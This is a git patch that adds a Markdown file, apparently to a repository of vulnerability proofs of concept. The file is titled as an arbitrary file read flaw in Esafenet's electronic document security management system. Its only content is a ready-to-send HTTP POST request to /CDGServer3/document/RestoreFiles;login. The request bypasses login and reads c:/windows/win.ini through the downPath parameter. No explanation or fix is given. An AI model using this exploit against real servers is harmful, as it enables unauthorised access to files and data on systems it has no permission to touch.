From d4f8e99300a5b5688f42f64154498c24cbaf4acb Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 30 Apr 2024 15:48:01 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E4=BA=BF=E8=B5=9B=E9=80=9A=E7=94=B5?= =?UTF-8?q?=E5=AD=90=E6=96=87=E6=A1=A3=E5=AE=89=E5=85=A8=E7=AE=A1=E7=90=86?= =?UTF-8?q?=E7=B3=BB=E7=BB=9FRestoreFiles=E4=BB=BB=E6=84=8F=E6=96=87?= =?UTF-8?q?=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...子文档安全管理系统RestoreFiles任意文件读取漏洞.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 亿赛通电子文档安全管理系统RestoreFiles任意文件读取漏洞.md diff --git a/亿赛通电子文档安全管理系统RestoreFiles任意文件读取漏洞.md b/亿赛通电子文档安全管理系统RestoreFiles任意文件读取漏洞.md new file mode 100644 index 0000000..5939d0c --- /dev/null +++ b/亿赛通电子文档安全管理系统RestoreFiles任意文件读取漏洞.md @@ -0,0 +1,14 @@ +## 亿赛通电子文档安全管理系统RestoreFiles任意文件读取漏洞 + + +## poc +``` +POST /CDGServer3/document/RestoreFiles;login HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 + +command=DownloadDoc&fileNameForDownload=&downPath=c:/windows/win.ini +```